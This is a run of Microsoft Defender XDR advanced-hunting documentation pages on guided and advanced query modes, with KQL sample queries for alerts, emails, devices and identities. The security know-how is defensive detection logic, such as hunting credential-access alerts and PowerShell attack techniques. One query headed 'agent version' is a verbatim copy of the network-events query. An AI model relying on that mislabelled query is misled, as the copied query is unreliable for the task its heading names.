--- Alert title and description-- Impacted assets-- Actions taken in response to the alert-- Query results that triggered the alert-- Information on the custom detection rule-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="../../media/new-alert-page.png" alt-text="An example of an alert page that displays new alerts generated by custom detection rules in Microsoft Defender portal" lightbox="../../media/new-alert-page.png":::
-
-## Write queries without DeviceAlertEvents
-
-In the Microsoft Defender XDR schema, the `AlertInfo` and `AlertEvidence` tables are provided to accommodate the diverse set of information that accompany alerts from various sources.
-
-To get the same alert information that you used to get from the `DeviceAlertEvents` table in the Microsoft Defender for Endpoint schema, filter the `AlertInfo` table by `ServiceSource` and then join each unique ID with the `AlertEvidence` table, which provides detailed event and entity information.
-
-See the sample query below:
-
-```kusto
-AlertInfo
-| where Timestamp > ago(7d)
-| where ServiceSource == "Microsoft Defender for Endpoint"
-| join AlertEvidence on AlertId
-```
-
-This query yields many more columns than `DeviceAlertEvents` in the Microsoft Defender for Endpoint schema. To keep results manageable, use `project` to get only the columns you are interested in. The example below projects columns you might be interested in when the investigation detected PowerShell activity:
-
-```kusto
-AlertInfo
-| where Timestamp > ago(7d)
-| where ServiceSource == "Microsoft Defender for Endpoint"
- and AttackTechniques has "powershell"
-| join AlertEvidence on AlertId
-| project Timestamp, Title, AlertId, DeviceName, FileName, ProcessCommandLine
-```
-
-If you'd like to filter for specific entities involved in the alerts, you can do so by specifying the entity type in `EntityType` and the value you would like to filter for. The following example looks for a specific IP address:
-
-```kusto
-AlertInfo
-| where Title == "Insert_your_alert_title"
-| join AlertEvidence on AlertId
-| where EntityType == "Ip" and RemoteIP == "192.88.99.01"
-```
-
-## See also
--- [Turn on Microsoft Defender XDR](advanced-hunting-query-language.md)-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Advanced hunting in Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-overview)
security Advanced Hunting Modes https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-modes.md
- Title: Choose between guided and advanced modes for hunting in Microsoft Defender XDR
-description: Guided hunting in Microsoft Defender XDR does not require KQL knowledge while advanced hunting allows you to write a query from scratch.
--
- - NOCSH
----
- - m365-security
- - m365initiative-m365-defender
- - tier2
-- Previously updated : 04/02/2024--
-# Choose between guided and advanced modes to hunt in Microsoft Defender XDR
--
-**Applies to:**
-- Microsoft Defender XDR-
-You can find the **advanced hunting** page by going to the left navigation bar in Microsoft Defender XDR and selecting **Hunting** > **Advanced hunting**. If the navigation bar is collapsed, select the hunting icon ![hunting icon](../../media/guided-hunting/hunting-icon.png).
-
-In the **advanced hunting** page, two modes are supported:
--- **Guided mode** ΓÇô to query using the query builder-- **Advanced mode** ΓÇô to query using the query editor using Kusto Query Language (KQL)-
-The main difference between the two modes is that the guided mode *does not* require the hunter to know KQL to query the database, while advanced mode requires KQL knowledge.
-
-Guided mode features a query builder that has an easy-to-use, visual, building-block style of constructing queries through dropdown menus containing available filters and conditions. To use guided mode, see [Get started with guided hunting mode](advanced-hunting-modes.md#get-started-with-guided-hunting-mode).
-
-Advanced mode features a query editor area where users can create queries from scratch. To use advanced mode, see [Get started with advanced hunting mode](advanced-hunting-modes.md#get-started-with-advanced-hunting-mode).
-
-## Get started with guided hunting mode
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-When you open the advanced hunting page for the first time after guided hunting is made available to you, you are invited to take the tour to learn more about the different parts of the page like the tabs and query areas.
-
-To take the tour, select **Take tour** when this banner appears:
-
-[![banner inviting user to take the tour](../../media/guided-hunting/1-guided-hunting-banner-tb.png)](../../media/guided-hunting/1-guided-hunting-banner.png#lightbox)
-
-Follow the blue teaching bubbles that appear throughout the page and select **Next** to move from one step to the next.
-
-You can take the tour again at any time by going to **Help resources** > **Learn more** and selecting **Take the tour**.
-
-![Screenshot of help resources](../../media/guided-hunting/help-resources.png)
-
-You can then start building your query to hunt for threats. The following articles can help you get the most out of hunting in guided mode:
-
-| Learning goal | Description | Resource |
-|--|--|--|
-| **Craft your first query** | Learn the basics of the query builder like specifying the data domain and adding conditions and filters to help you create a meaningful query. Learn further by running sample queries. | [Build hunting queries using guided mode](advanced-hunting-query-builder.md) |
-| **Learn the different query builder capabilities** | Get to know the different supported data types and guided mode capabilities to help you fine-tune your query according to your needs. | [Refine your query in guided mode](advanced-hunting-query-builder-details.md) |
-| **Learn what you can do with query results** | Get familiar with the Results view and what you can do with generated results like how to take action on them or link them to an incident. | - [Work with query results in guided mode](advanced-hunting-query-builder-results.md)<br /> - [Take action on query results](advanced-hunting-take-action.md) <br /> - [Link query results to an incident](advanced-hunting-link-to-incident.md) |
-| **Create custom detection rules** | Understand how you can use advanced hunting queries to trigger alerts and take response actions automatically. | - [Custom detections overview](custom-detections-overview.md) <br />- [Custom detection rules](custom-detection-rules.md) |
-
-## Get started with advanced hunting mode
-
-We recommend going through these steps to quickly get started with advanced hunting:
-
-| Learning goal | Description | Resource |
-|--|--|--|
-| **Learn the language** | Advanced hunting is based on [Kusto query language](/azure/kusto/query/), supporting the same syntax and operators. Start learning the query language by running your first query. | [Query language overview](advanced-hunting-query-language.md) |
-| **Learn how to use the query results** | Learn about charts and various ways you can view or export your results. Explore how you can quickly tweak queries, drill down to get richer information, and take response actions. | - [Work with query results in advanced mode](advanced-hunting-query-results.md)<br /> - [Take action on query results](advanced-hunting-take-action.md) <br /> - [Link query results to an incident](advanced-hunting-link-to-incident.md) |
-| **Understand the schema** | Get a good, high-level understanding of the tables in the schema and their columns. Learn where to look for data when constructing your queries. | - [Schema reference](advanced-hunting-schema-tables.md) <br />- [Transition from Microsoft Defender for Endpoint](advanced-hunting-migrate-from-mde.md) |
-| **Get expert tips and examples** | Train for free with guides from Microsoft experts. Explore collections of predefined queries covering different threat hunting scenarios. | - [Get expert training](advanced-hunting-expert-training.md) <br />- [Use shared queries](advanced-hunting-shared-queries.md) <br />- [Go hunt](advanced-hunting-go-hunt.md) <br />- [Hunt for threats across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md) |
-| **Optimize queries and handle errors** | Understand how to create efficient and error-free queries. | - [Query best practices](advanced-hunting-best-practices.md)<br />- [Handle errors](advanced-hunting-errors.md) |
-| **Create custom detection rules** | Understand how you can use advanced hunting queries to trigger alerts and take response actions automatically. | - [Custom detections overview](custom-detections-overview.md) <br />- [Custom detection rules](custom-detection-rules.md)|
-
-## See also
--- [Understand the schema](advanced-hunting-schema-tables.md)-- [Build hunting queries using guided mode](advanced-hunting-query-builder.md)-- [Learn the query language](advanced-hunting-query-language.md)
security Advanced Hunting Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-overview.md
- Title: Overview - Advanced hunting
-description: Learn about advanced hunting queries in Microsoft 365 and how to use them to proactively find threats and weaknesses in your network
-
-ms.pagetype: security
- - NOCSH
----
- - m365-security
- - m365initiative-m365-defender
- - tier1
-- Previously updated : 03/28/2024--
-# Proactively hunt for threats with advanced hunting in Microsoft Defender XDR
---
-**Applies to:**
-- Microsoft Defender XDR-
-Advanced hunting is a query-based threat hunting tool that lets you explore up to 30 days of raw data. You can proactively inspect events in your network to locate threat indicators and entities. The flexible access to data enables unconstrained hunting for both known and potential threats.
-
-Advanced hunting supports two modes, guided and advanced. Use [guided mode](advanced-hunting-query-builder.md) if you are not yet familiar with Kusto Query Language (KQL) or prefer the convenience of a query builder. Use [advanced mode](advanced-hunting-query-language.md) if you are comfortable using KQL to create queries from scratch.
-
-**To start hunting, read [Choose between guided and advanced modes to hunt in Microsoft Defender XDR](advanced-hunting-modes.md).**
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4G6DO]
-
-You can use the same threat hunting queries to build custom detection rules. These rules run automatically to check for and then respond to suspected breach activity, misconfigured machines, and other findings.
-
-Advanced hunting supports queries that check a broader data set coming from:
--- Microsoft Defender for Endpoint-- Microsoft Defender for Office 365-- Microsoft Defender for Cloud Apps-- Microsoft Defender for Identity-
-To use advanced hunting, [turn on Microsoft Defender XDR](m365d-enable.md).
--
-For more information on advanced hunting in Microsoft Defender for Cloud Apps data, see the [video](https://www.microsoft.com/en-us/videoplayer/embed/RWFISa).
---
-## Get access
-To use advanced hunting or other [Microsoft Defender XDR](microsoft-365-defender.md) capabilities, you need an appropriate role in Microsoft Entra ID. [Read about required roles and permissions for advanced hunting](custom-roles.md).
-
-Also, your access to endpoint data is determined by role-based access control (RBAC) settings in Microsoft Defender for Endpoint. [Read about managing access to Microsoft Defender XDR](m365d-permissions.md).
--
-## Data freshness and update frequency
-Advanced hunting data can be categorized into two distinct types, each consolidated differently.
--- **Event or activity data**ΓÇöpopulates tables about alerts, security events, system events, and routine assessments. Advanced hunting receives this data almost immediately after the sensors that collect them successfully transmit them to the corresponding cloud services. For example, you can query event data from healthy sensors on workstations or domain controllers almost immediately after they are available on Microsoft Defender for Endpoint and Microsoft Defender for Identity.-- **Entity data**ΓÇöpopulates tables with information about users and devices. This data comes from both relatively static data sources and dynamic sources, such as Active Directory entries and event logs. To provide fresh data, tables are updated with any new information every 15 minutes, adding rows that might not be fully populated. Every 24 hours, data is consolidated to insert a record that contains the latest, most comprehensive data set about each entity.--
-## Time zone
-### Queries
-Advanced hunting data uses the UTC (Universal Time Coordinated) timezone.
-![Screenshot of custom time range.](../../media/custom-time-range.png)
-
-Queries should be created in UTC.
-
-### Results
-Advanced hunting results are converted to the [timezone](m365d-time-zone.md) set in Microsoft Defender XDR.
----
-## Related topics
-- [Choose between guided and advanced hunting modes](advanced-hunting-modes.md)-- [Build hunting queries using guided mode](advanced-hunting-query-builder.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Microsoft Graph security API](/graph/api/resources/security-api-overview#advanced-hunting)-- [Custom detections overview](custom-detections-overview.md)
security Advanced Hunting Query Builder Details https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-query-builder-details.md
- Title: Supported data types and filters in guided mode for hunting in Microsoft Defender XDR
-description: Refine your query by using the different guided mode capabilities in advanced hunting in Microsoft Defender XDR.
--
- - NOCSH
----
- - m365-security
- - m365initiative-m365-defender
- - tier2
- Previously updated : 04/01/2024--
-# Refine your query in guided mode
---
-**Applies to:**
-- Microsoft Defender XDR-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-## Use different data types
-
-Advanced hunting in guided mode supports several data types that you can use to fine-tune your query.
--- Numbers<br>
-![Screenshot of numbers as third condition](../../media/guided-hunting/21-numbers.png)
--- Strings<br>
-![Screenshot of strings as third condition](../../media/guided-hunting/21-string.png)
-
- In the free text box, type the value and press **Enter** to add it. Note that the delimiter between values is **Enter**.<br>
-
- ![Screenshot showing different conditions you can use](../../media/guided-hunting/23-string2.png)
--- Boolean<br>
-![Screenshot of Boolean values as third condition](../../media/guided-hunting/24-boolean.png)
---- Datetime<br>
-![Screenshot of datetime values as third condition](../../media/guided-hunting/25-datetime.png)
---- Closed list - You don't need to remember the exact value you are looking for. You can easily choose from a suggested closed list that supports multi-selection.<br>
-![Screenshot of a closed list used as third condition](../../media/guided-hunting/26-closed.png)
--
-## Use subgroups
-You can create groups of conditions by clicking **Add subgroup**:
-
-![Screenshot highlighting Add subgroup button](../../media/guided-hunting/27-subgroup1.png)
-
-![Screenshot showing use of subgroups](../../media/guided-hunting/28-subgroup2.png)
-
-## Use smart auto-complete for search
-Smart auto-complete for searching devices and user accounts is supported.
-You don't need to remember the device ID, full device name, or user account name. You can start typing the first few characters of the device or user you are looking for and a suggested list appears from which you can choose what you need:
-
-![Screenshot showing smart auto-complete support](../../media/guided-hunting/29-smart-auto.png)
-
-## Use `EventType`
-You can even look for specific event types like all failed logons, file modification events, or successful network connections by using the **EventType** filter in any section where it is applicable.
-
-For instance, if you want to add a condition that looks for registry value deletions, you can go to the **Registry Events** section and select **EventType**.
-
-![Screenshot of various EventTypes](../../media/guided-hunting/30-eventtype1.png)
-
-Selecting EventType under Registry Events allows you to choose from different registry events, including the one you're hunting for, **RegistryValueDeleted**.
-
-![Screenshot of EventType RegistryValueDeleted](../../media/guided-hunting/31-eventtype2.png)
-
-> [!NOTE]
->`EventType` is the equivalent of `ActionType` in the data schema, which users of advanced mode might be more familiar with.
-
-## Test your query with a smaller sample size
-If you're still working on your query and would like to see its performance and some sample results quickly, adjust the number of records to return by picking a smaller set through the **Sample size** dropdown menu.
-
-![Screenshot of sample size dropdown menu](../../media/guided-hunting/32-sample-size.png)
-
-The sample size is set to 10,000 results by default. This is the maximum number of records that can be returned in hunting. However, we highly recommend lowering the sample size to 10 or 100 to quickly test your query as doing so consumes less resources while you are still working on improving the query.
-
-Then, once you finalize your query and are ready to use it to get all the relevant results for your hunting activity, make sure that the sample size is set to 10k, the maximum.
-
-## Switch to advanced mode after building a query
-You can click on **Edit in KQL** to view the KQL query generated by your selected conditions. Editing in KQL opens a new tab in advanced mode, with the corresponding KQL query:
-
-![Screenshot highlighting Edit in KQL button](../../media/guided-hunting/33-edit-kql.png)
-
-![Screenshot showing same query from guided to advanced](../../media/guided-hunting/33-edit-kql-2.png)
-
-In the above example, the selected view is All, therefore you can see that the KQL query searches all tables that have file properties of name and SHA256, and in all the relevant columns covering these properties.
-
-If you change the view to **Emails & collaboration**, the query is narrowed down to:
-
-![Screenshot showing same query from guided to advanced but with limited domain](../../media/guided-hunting/34-edit-kql-3.png)
-
-## See also
security Advanced Hunting Query Builder Results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-query-builder-results.md
- Title: Work with query results in guided mode for hunting in Microsoft Defender XDR
-description: Use and customize query results in guided mode for advanced hunting in Microsoft Defender XDR
--
- - NOCSH
----
- - m365-security
- - tier2
- Previously updated : 08/11/2023--
-# Work with query results in guided mode
--
-**Applies to:**
-- Microsoft Defender XDR-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-In hunting using guided mode, the results of the query appear in the **Results** tab.
-
-![Screenshot of results tab](../../media/guided-hunting/35-query-results.png)
-
-You can work on the results further by exporting them to a CSV file by selecting **Export**. This downloads the CSV file for your use.
-
-You can view other information in the Results view:
--- Number of records in the results list (beside the Search button)-- Duration of the query run time-- Resource usage of the query-
-## View more columns
-
-A few standard columns are included in the results for easy viewing.
-
-To view more columns:
-
-1. Select **Customize columns** in the upper right-hand portion of the results view.
-2. From here, select the columns to include in the results view and deselect columns to hide.
-
- ![Screenshot of list of columns you can add to the results view](../../media/guided-hunting/36-columns.png)
-
-3. Select **Apply** to view results with the added columns. Use the scroll bars if necessary.
-
-## See also
--- [Advanced hunting quotas and usage parameters](advanced-hunting-limits.md)-- [Switch to advanced mode](advanced-hunting-query-builder-details.md#switch-to-advanced-mode-after-building-a-query)-- [Refine your query in guided mode](advanced-hunting-query-builder-details.md)
security Advanced Hunting Query Builder https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-query-builder.md
- Title: Build queries using guided mode in Microsoft Defender XDR advanced hunting
-description: Learn how to build queries in guided mode by combining different available filters and conditions.
--
- - NOCSH
----
- - m365-security
- - tier2
- Previously updated : 08/11/2023--
-# Build hunting queries using guided mode in Microsoft Defender XDR
--
-**Applies to:**
-- Microsoft Defender XDR-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-The query builder in guided mode allows analysts to craft meaningful hunting queries *without knowing Kusto Query Language (KQL) or the data schema*. Analysts from every tier of experience can use the query builder to filter through data from the last 30 days to look for threats, expand incident investigations, perform data analytics on threat data, or focus on specific threat areas.
-
-The analyst can choose which data set to look at and which filters and conditions to use to narrow the data down to what they need.
-
-You can watch this video to get an overview of guided hunting:
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RW12cm6]
-
-## Open Query in builder
-
-In the **Advanced hunting** page, select **Create new** to open a new query tab and select **Query in builder**.
-
-![Screenshot of guided mode query builder](../../media/guided-hunting/01-open-query-builder.png)
-
-This brings you to the guided mode, where you can then construct your query by selecting different components using dropdown menus.
-
-## Specify the data domain to hunt in
-
-You can control the scope of the hunt by selecting which domain the query covers:
-
-![Screenshot of guided mode query builder domains dropdown](../../media/guided-hunting/02-specify-domain.png)
-
-Selecting **All** includes data from all domains you currently have access to. Narrowing down to a specific domain allows filters relevant to that domain only.
-
-You can choose from:
--- All domains - to look through all available data in your query-- Endpoints - to look through endpoint data as provided by Microsoft Defender for Endpoint-- Apps and identities - to look through application and identity data as provided by Microsoft Defender for Cloud Apps and Microsoft Defender for Identity; users familiar with [Activity log](/defender-cloud-apps/activity-filters) can find the same data here-- Email and collaboration - to look through email and collaboration apps data like SharePoint, OneDrive and others; users familiar with [Threat Explorer](../office-365-security/threat-explorer-real-time-detections-about.md) can find the same data here-
-## Use basic filters
-
-By default, guided hunting includes a few basic filters to get you started fast.
-
-![Screenshot of guided mode query builder basic filter set](../../media/guided-hunting/03-use-basic-filters.png)
-
-When you choose one data source, for instance, **Endpoints**, the query builder displays only the applicable filter groups. You can then choose a filter you are interested in narrowing down by selecting that filter group, for instance, **EventType**, and selecting the filter of your choice.
-
-![Screenshot of guided mode query builder endpoint basic filter set](../../media/guided-hunting/03a-use-basic-filters.png)
-
-Once the query is ready, select the blue **Run query** button. If the button is grayed out, it means the query needs to be filled out or edited further.
-
-> [!NOTE]
-> The basic filter view uses the **AND** operator only, meaning running the query generates results for which all set filters are true.
-
-## Load sample queries
-
-Another quick way to get familiar with guided hunting is to load sample queries using the **Load sample queries** dropdown menu.
-![Screenshot of guided mode query builder load sample queries list](../../media/guided-hunting/05-load-sample-queries.png)
-
-> [!NOTE]
-> Selecting a sample query overrides the existing query.
-
-Once the sample query is loaded, select **Run query**.
-
-![Screenshot of guided mode query builder loaded query](../../media/guided-hunting/06-load-sample-queries.png)
-
-If you have previously selected a domain, the list of available sample queries changes accordingly.
-
-![Screenshot of guided mode query builder restricted list](../../media/guided-hunting/07-load-sample-queries.png)
-
-To restore the complete list of sample queries, select **All domains** then reopen **Load sample queries**.
-
-If the loaded sample query uses filters outside of the basic filter set, the toggle button is grayed out. To go back to the basic filter set, select **Clear all** then toggle **All filters**.
-
-## Use more filters
-
-To view more filter groups and conditions, select **Toggle to see more filters and conditions**.
-
-![Screenshot of guided mode query builder more filters toggle](../../media/guided-hunting/08-use-more-filters.png)
-
-When the **All filters** toggle is active, you can now use the full range of filters and conditions in guided mode.
-
-![Screenshot of guided mode query builder all filters active](../../media/guided-hunting/09-use-more-filters.png)
-
-### Create conditions
-
-To specify a set of data to be used in the query, select **Select a filter**. Explore the different filter sections to find what is available to you.
-
-![Screenshot showing different filters you can use](../../media/guided-hunting/10-create-conditions.png)
-
-Type the section's titles in the search box at the top of the list to find the filter. Sections ending in *info* contain filters that provide information about the different components you can look at and filters for the states of entities. Sections ending in *events* contain filters that allow you to look for any monitored event on the entity. For instance, to hunt for activities involving certain devices, you can use the filters under the **Device events** section.
-
-> [!NOTE]
-> Choosing a filter that isn't in the basic filters list deactivates or grays out the toggle to return to the basic filters view. To reset the query or remove existing filters in the current query, select **Clear all**. This also reactivates the basic filters list.
-
-Next, set the appropriate condition to further filter the data by selecting it from the second dropdown menu and providing entries in the third dropdown menu if necessary:
-
-![Screenshot showing different conditions you can use](../../media/guided-hunting/11-create-conditions.png)
-
-You can add more conditions to your query by using **AND**, and **OR** conditions. AND returns results that fulfill all conditions in the query, while OR returns results that fulfill any of the conditions in the query.
-
-![Screenshot showing AND OR operators](../../media/guided-hunting/12-create-conditions.png)
-
-Refining your query allows you to automatically sift through voluminous records to generate a list of results that is already targeted to your specific threat hunting need.
-
-To get to know what data types are supported and other guided mode capabilities to help you fine-tune your query, read [Refine your query in guided mode](advanced-hunting-query-builder-details.md).
-
-## Try sample query walk-throughs
-
-Another way to get familiar with guided hunting is to load sample queries pre-created in guided mode.
-
-In the **Getting started** section of the hunting page, we have provided three guided query examples that you can load. The query examples contain some of the most common filters and inputs you would typically need in your hunting. Loading any of the three sample queries opens a guided tour of how you would construct the entry using guided mode.
-
-![Screenshot of guided mode query builder getting started query walkthroughs](../../media/guided-hunting/13-try-sample-query-walkthroughs.png)
-
-Follow the instructions in the blue teaching bubbles to construct your query. Select **Run query**.
-
-## Try some queries
-
-### Hunt for successful connections to specific IP
-
-To hunt for successful network communications to a specific IP address, start typing "ip" to get suggested filters:
-
-![Screenshot of guided mode query builder hunt for successful connections to specific IP first filter](../../media/guided-hunting/14-hunt-for-ips.png)
-
-To look for events involving a specific IP address where the IP is the destination of the communication, select `DestinationIPAddress` under the IP Address Events section. Then select the **equals** operator. Type the IP in the third dropdown menu and press **Enter**:
-
-![Screenshot of guided mode query builder hunt for successful connections to specific IP](../../media/guided-hunting/15-hunt-for-ips.png)
-
-Then, to add a second condition which searches for successful network communication events, search for the filter of a specific event type:
-
-![Screenshot of guided mode query builder hunt for successful connections to specific IP, second condition](../../media/guided-hunting/16-hunt-for-ips.png)
-
-The **EventType** filter looks for the different event types logged. It is equivalent to the **ActionType** column which exists in most of the tables in advanced hunting. Select it to choose one or more event types to filter for. To look for successful network communication events, expand the **DeviceNetworkEvents** section and then choose `ConnectionSuccess`:
-
-![Screenshot of guided mode query builder hunt for successful connections to specific IP third condition](../../media/guided-hunting/17-hunt-for-ips.png)
-
-Finally, select **Run query** to hunt for all successful network communications to the 52.168.117.170 IP address:
-
-![Screenshot of guided mode query builder hunt for successful connections to specific IP results view](../../media/guided-hunting/18-hunt-for-ips.png)
-
-### Hunt for high confidence phish or spam emails delivered to inbox
-
-To look for all high confidence phish and spam emails that were delivered to the inbox folder at the time of delivery, first select **ConfidenceLevel** under Email Events, select **equals** and choose **High** under both **Phish** and **Spam** from the suggested closed list which supports multi-selection:
-
-![Screenshot of guided mode query builder hunt high confidence phish or spam emails delivered to inbox, first condition](../../media/guided-hunting/19-hunt-for-phish.png)
-
-Then, add another condition, this time specifying the folder or **DeliveryLocation, Inbox/folder**.
-
-![Screenshot of guided mode query builder hunt high confidence phish or spam emails delivered to inbox, second condition](../../media/guided-hunting/20-hunt-for-phish.png)
-
-## See also
--- [Refine your query in guided mode](advanced-hunting-query-builder-details.md)-- [Work with query results in guided mode](advanced-hunting-query-builder-results.md)
security Advanced Hunting Query Emails Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-query-emails-devices.md
- Title: Hunt for threats across devices, emails, apps, and identities with advanced hunting
-description: Study common hunting scenarios and sample queries that cover devices, emails, apps, and identities.
--
- - NOCSH
----
- - m365-security
- - tier1
- Previously updated : 02/16/2024--
-# Hunt for threats across devices, emails, apps, and identities
---
-**Applies to:**
-- Microsoft Defender XDR-
-[Advanced hunting](advanced-hunting-overview.md) in Microsoft Defender XDR allows you to proactively hunt for threats across:
--- Devices managed by Microsoft Defender for Endpoint-- Emails processed by Microsoft 365-- Cloud app activities, authentication events, and domain controller activities tracked by Microsoft Defender for Cloud Apps and Microsoft Defender for Identity-
-With this level of visibility, you can quickly hunt for threats that traverse sections of your network, including sophisticated intrusions that arrive on email or the web, elevate local privileges, acquire privileged domain credentials, and move laterally to across your devices.
-
-Here are general techniques and sample queries based on various hunting scenarios that can help you explore how you might construct queries when hunting for such sophisticated threats.
-
-## Get entity info
-
-Use these queries to learn how you can quickly get information about user accounts, devices, and files.
-
-### Obtain user accounts from email addresses
-
-When constructing queries across [tables that cover devices and emails](advanced-hunting-schema-tables.md), you will likely need to obtain user account names from sender or recipient email addresses. You can generally do this for either recipient or sender address using the *local-host* from the email address.
-
-In the snippet below, we use the [tostring()](/azure/data-explorer/kusto/query/tostringfunction) Kusto function to extract the local-host right before the `@` from recipient email addresses in the column `RecipientEmailAddress`.
-
-```kusto
-//Query snippet showing how to extract the account name from an email address
-AccountName = tostring(split(RecipientEmailAddress, "@")[0])
-```
-
-The query below shows how this snippet can be used:
-
-```kusto
-EmailEvents
-| where Timestamp > ago(7d)
-| project RecipientEmailAddress, AccountName = tostring(split(RecipientEmailAddress, "@")[0]);
-```
-
-### Merge the IdentityInfo table
-
-You can get account names and other account information by merging or joining the [IdentityInfo table](advanced-hunting-identityinfo-table.md). The query below obtains the list of phishing and malware detections from the [EmailEvents table](advanced-hunting-emailevents-table.md) and then joins that information with the `IdentityInfo` table to get detailed information about each recipient.
-
-```kusto
-EmailEvents
-| where Timestamp > ago(7d)
-//Get email processing events where the messages were identified as either phishing or malware
-| where ThreatTypes has "Malware" or ThreatTypes has "Phish"
-//Merge email events with identity info to get recipient details
-| join (IdentityInfo | distinct AccountUpn, AccountDisplayName, JobTitle,
-Department, City, Country) on $left.RecipientEmailAddress == $right.AccountUpn
-//Show important message and recipient details
-| project Timestamp, NetworkMessageId, Subject, ThreatTypes,
-SenderFromAddress, RecipientEmailAddress, AccountDisplayName, JobTitle,
-Department, City, Country
-```
-
-Watch this [short video](https://www.youtube.com/watch?v=8qZx7Pp5XgM) to learn how you can use Kusto Query Language to join tables.
-
-### Get device information
-
-The [advanced hunting schema](advanced-hunting-schema-tables.md) provides extensive device information in various tables. For example, the [DeviceInfo table](advanced-hunting-deviceinfo-table.md) provides comprehensive device information based on event data aggregated regularly. This query uses the `DeviceInfo` table to check if a potentially compromised user (`<account-name>`) has logged on to any devices and then lists the alerts that have been triggered on those devices.
-
-> [!TIP]
-> This query uses `kind=inner` to specify an [inner-join](/azure/data-explorer/kusto/query/joinoperator?pivots=azuredataexplorer#inner-join-flavor), which prevents deduplication of left side values for `DeviceId`.
-
-```kusto
-DeviceInfo
-//Query for devices that the potentially compromised account has logged onto
-| where LoggedOnUsers contains '<account-name>'
-| distinct DeviceId
-//Crosscheck devices against alert records in AlertEvidence and AlertInfo tables
-| join kind=inner AlertEvidence on DeviceId
-| project AlertId
-//List all alerts on devices that user has logged on to
-| join AlertInfo on AlertId
-| project AlertId, Timestamp, Title, Severity, Category
-```
-
-### Get file event information
-
-Use the following query to get information on file related events.
-
-```kusto
-DeviceInfo
-| where Timestamp > ago(1d)
-| where ClientVersion startswith "20.1"
-| summarize by DeviceId
-| join kind=inner (
- DeviceFileEvents
- | where Timestamp > ago(1d)
-) on DeviceId
-| take 10
-```
-
-### Get network event information
-
-Use the following query to get information on network related events.
-
-```kusto
-DeviceInfo
-| where Timestamp > ago(1d)
-| where ClientVersion startswith "20.1"
-| summarize by DeviceId
-| join kind=inner (
- DeviceNetworkEvents
- | where Timestamp > ago(1d)
-) on DeviceId
-| take 10
-```
-
-### Get device agent version information
-
-Use the following query to get the version of the agent running on a device.
-
-```kusto
-DeviceInfo
-| where Timestamp > ago(1d)
-| where ClientVersion startswith "20.1"
-| summarize by DeviceId
-| join kind=inner (
- DeviceNetworkEvents
- | where Timestamp > ago(1d)
-) on DeviceId
-| take 10
-```
-
-### Example query for macOS devices
-
-Use the following example query to see all devices running macOS with a version older than Catalina.
-
-```kusto
-DeviceInfo
-| where Timestamp > ago(1d)
-| where OSPlatform == "macOS" and OSVersion !contains "10.15" and OSVersion !contains "11."
-| summarize by DeviceId
-| join kind=inner (
- DeviceInfo
- | where Timestamp > ago(1d)
-) on DeviceId
-| take 10
-```
-
-### Get device status info
-
-Use the following query to get status of a device. In the following example, the query checks to see if the device is onboarded.
-
-```kusto
-DeviceInfo
-| where Timestamp > ago(1d)
-| where OnboardingStatus != "Onboarded"
-| summarize by DeviceId
-| join kind=inner (
- DeviceInfo
- | where Timestamp > ago(1d)
-) on DeviceId
-| take 10
-```
-
-## Hunting scenarios
-
-### List logon activities of users that received emails that were not zapped successfully
-
-[Zero-hour auto purge (ZAP)](../office-365-security/zero-hour-auto-purge.md) addresses malicious emails after they have been received. If ZAP fails, malicious code might eventually run on the device and leave accounts compromised. This query checks for logon activity made by the recipients of emails that were not successfully addressed by ZAP.
-
-```kusto
-EmailPostDeliveryEvents
-| where Timestamp > ago(7d)
-//List malicious emails that were not zapped successfully
-| where ActionType has "ZAP" and ActionResult == "Error"
-| project ZapTime = Timestamp, ActionType, NetworkMessageId , RecipientEmailAddress
-//Get logon activity of recipients using RecipientEmailAddress and AccountUpn
-| join kind=inner IdentityLogonEvents on $left.RecipientEmailAddress == $right.AccountUpn
-| where Timestamp between ((ZapTime-24h) .. (ZapTime+24h))
-//Show only pertinent info, such as account name, the app or service, protocol, the target device, and type of logon
-| project ZapTime, ActionType, NetworkMessageId , RecipientEmailAddress, AccountUpn,
-LogonTime = Timestamp, AccountDisplayName, Application, Protocol, DeviceName, LogonType
-```
-
-### Get logon attempts by domain accounts targeted by credential theft
-
-This query first identifies all credential access alerts in the `AlertInfo` table. It then merges or joins the `AlertEvidence` table, which it parses for the names of the targeted accounts and filters for domain-joined accounts only. Finally, it checks the `IdentityLogonEvents` table to get all logon activities by the domain-joined targeted accounts.
-
-```kusto
-AlertInfo
-| where Timestamp > ago(30d)
-//Get all credential access alerts
-| where Category == "CredentialAccess"
-//Get more info from AlertEvidence table to get the SID of the target accounts
-| join AlertEvidence on AlertId
-| extend IsJoined=(parse_json(AdditionalFields).Account.IsDomainJoined)
-| extend TargetAccountSid=tostring(parse_json(AdditionalFields).Account.Sid)
-//Filter for domain-joined accounts only
-| where IsJoined has "true"
-//Merge with IdentityLogonEvents to get all logon attempts by the potentially compromised target accounts
-| join kind=inner IdentityLogonEvents on $left.TargetAccountSid == $right.AccountSid
